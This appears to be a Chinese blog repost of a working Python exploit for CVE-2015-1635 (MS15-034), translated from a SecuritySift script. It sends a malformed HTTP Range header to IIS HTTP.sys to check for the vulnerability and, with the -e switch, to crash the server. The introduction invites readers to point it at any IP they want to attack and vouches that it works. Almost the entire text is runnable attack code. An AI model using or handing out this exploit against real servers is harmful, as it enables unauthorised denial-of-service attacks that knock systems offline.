http-cve2015-1635 EXP HTTP.sys 远程执行代码(CVE-2015-1635 MS15-034)
本执行代码转载网络来源地址:http://www.securitysift.com/an-analysis-of-ms15-034/
本人经过汉化了,如果看着汉化的不顺眼可以自己去用原版。。。。
http-vuln-cve2015-1635.nse HTTP.sys 远程执行代码exp
网上的试验了几个都不好使,不知道为什么,但是下面的这个本人亲测,绝对可以用的 POC。
把下方代码保存为 xxxx.py 试用方法: xxxx.py http://ip(换成你要攻击的IP) -e (使用这个参数表示开始攻击。)
#!/usr/bin/python
#coding=utf8
import urllib2
import sys
import argparse
import socket
''' get cl args '''
def getArgs():
    """Parse the command line for ms15_034.py.

    Positional ``target`` is the base URL; ``-p/--path`` selects the resource,
    ``-e/--exploit`` switches from a plain check to the DoS attempt, and
    ``-r/--range`` supplies the Range header value.  Returns the argparse
    Namespace produced by parse_args().
    """
    wide_help = lambda prog: argparse.HelpFormatter(prog, max_help_position=50)
    parser = argparse.ArgumentParser(
        prog="ms15_034.py",
        formatter_class=wide_help,
        epilog="这个脚本将测试存在或利用DOS状态ms15_034",
    )
    parser.add_argument(
        "target",
        help="Target Host in the form of http://[host]:[port] -- specify port only if not 80",
    )
    # Optional switches, declared as (flags, add_argument kwargs) pairs.
    optional = [
        (("-p", "--path"),
         dict(default="/welcome.png",
              help="资源在目标服务器上的路径 默认 [default = /welcome.png] 上面是win7的 /iis-85.png 是win2012的")),
        (("-e", "--exploit"),
         dict(action="store_true", default=False,
              help="加上此参数则表示攻击此服务器 默认 [default = False]")),
        (("-r", "--range"),
         dict(default="0-18446744073709551615",
              help="修改头部代码 默认 [default=0-18446744073709551615]; 这可能会导致对方服务器蓝屏!!!")),
    ]
    for flags, spec in optional:
        parser.add_argument(*flags, **spec)
    return parser.parse_args()
''' make the evil request and examine response to determine vulnerability '''
def evilRequest(req, exploit):
    """Send *req* and classify the target from the response or error text.

    Args:
        req: a urllib2.Request whose Range header the caller has already set.
        exploit: True when the caller asked for the DoS attempt, False for a
            plain vulnerability check.  It only changes which messages are
            printed and whether a reset connection is retried.

    Returns:
        The response body as a str when the request succeeded, otherwise "".

    Classification relies entirely on substring matches against the text of
    whatever exception urllib2 raised; nothing inspects status codes directly.
    """
    res = ""
    if exploit:
        print "[*] 尝试测试中..."
    try:
        res = urllib2.urlopen(req).read() # make request
        if exploit:
            print "[*] 无法解析响应,检查目标,请查看是否成功!"
        else:
            print "[*] 请求成功,可能不易受攻击" # no error came back, so the target is probably not vulnerable
    except:
        # NOTE(review): a bare except also swallows KeyboardInterrupt and
        # SystemExit, so Ctrl-C during a request lands in the branches below.
        if "Requested Range Not Satisfiable" in str(sys.exc_info()[1]): # response if target is unpatched
            # A 416 to the oversized Range is the fingerprint an unpatched
            # HTTP.sys gives back; the same string is what a detector can key on.
            print "[*] 恭喜恭喜它有漏洞呦!!!"
        elif "The Request has an invalid header name" in str(sys.exc_info()[1]): # typical response if target is patched
            print "[*] 目标出现了"
        elif (("Connection reset by peer" in str(sys.exc_info()[1])) or ("forcibly closed" in str(sys.exc_info()[1]))) and (exploit): # often DoS exploit not successful on first attempt
            print "[*] 连接复位,重新尝试利用..."
            # Recursive retry with no attempt counter: it only ends when a later
            # attempt raises something other than a reset (e.g. the socket
            # timeout installed by main), so each retry adds a stack frame.
            res = evilRequest(req, exploit)
        elif ("timed out" in str(sys.exc_info()[1])) and (exploit): # prevent loop after DoS function (used w/ socket timeout variable in main)
            print "[*] 请求超时,可能成功了呦。"
        elif ("timed out" in str(sys.exc_info()[1])) and (not exploit): # prevent loop after DoS function (used w/ socket timeout variable in main)
            print "[*] 请求超时,但利用开关不使用。你有没修改文件头大小?"
        else:
            print "[*] 不能确定目标是否有漏洞" # any other response means vuln unknown
            print "\t[+] Response: %s" % str(sys.exc_info()[1]) # print server response
    return res
''' main '''
def main():
    """Entry point: print the banner, parse the CLI, send one crafted request.

    All behaviour comes from getArgs(): the -e switch replaces whatever Range
    value was given with the fixed range below, and socket.setdefaulttimeout(10)
    is what makes the "timed out" branches in evilRequest reachable at all.
    The body returned by evilRequest is assigned but never used.
    """
    print
    print '============================================================================='
    print '| ms15_034.py - Test and DoS exploit |'
    print '| Author: Mike Czumak (T_v3rn1x) - @SecuritySift |'
    print '| 虾米汉化 URL地址:https://woj.app/ |'
    print '=============================================================================\n'
    args = getArgs()
    target = args.target # target server
    path = args.path # path to resource to retrieve on target server
    range = args.range # value of Range header (shadows the builtin `range`; nothing below needs the builtin)
    exploit = args.exploit # boolean (exploit DoS or not)
    if exploit:
        range = "18-18446744073709551615" # evil range if requesting welcome.png
        # may need to change if requesting different resource (use range arg instead)
        # NOTE(review): this silently discards any -r value once -e is given.
    print "[*] Making request to " + target
    print "\t[+] Target path: " + path
    print "\t[+] Range Header: " + range
    print "\t[+] Exploit (DoS)?: " + str(exploit)
    print
    socket.setdefaulttimeout(10) # timeout the connection in event of DoS/reboot
    # The whole probe is a single GET whose Range header ends in 18446744073709551615
    # (2**64 - 1); that header value is the thing a WAF/IDS rule can alert on,
    # and the MS15-034 patch is the fix on the server side.
    req = urllib2.Request( "%s%s"%(target,path), headers={ "Range" : "bytes=%s" % range }) # format request
    res = evilRequest(req, exploit) # make request
    print
# Script entry guard: run main() only when executed directly, not on import.
if __name__ == '__main__':
    main()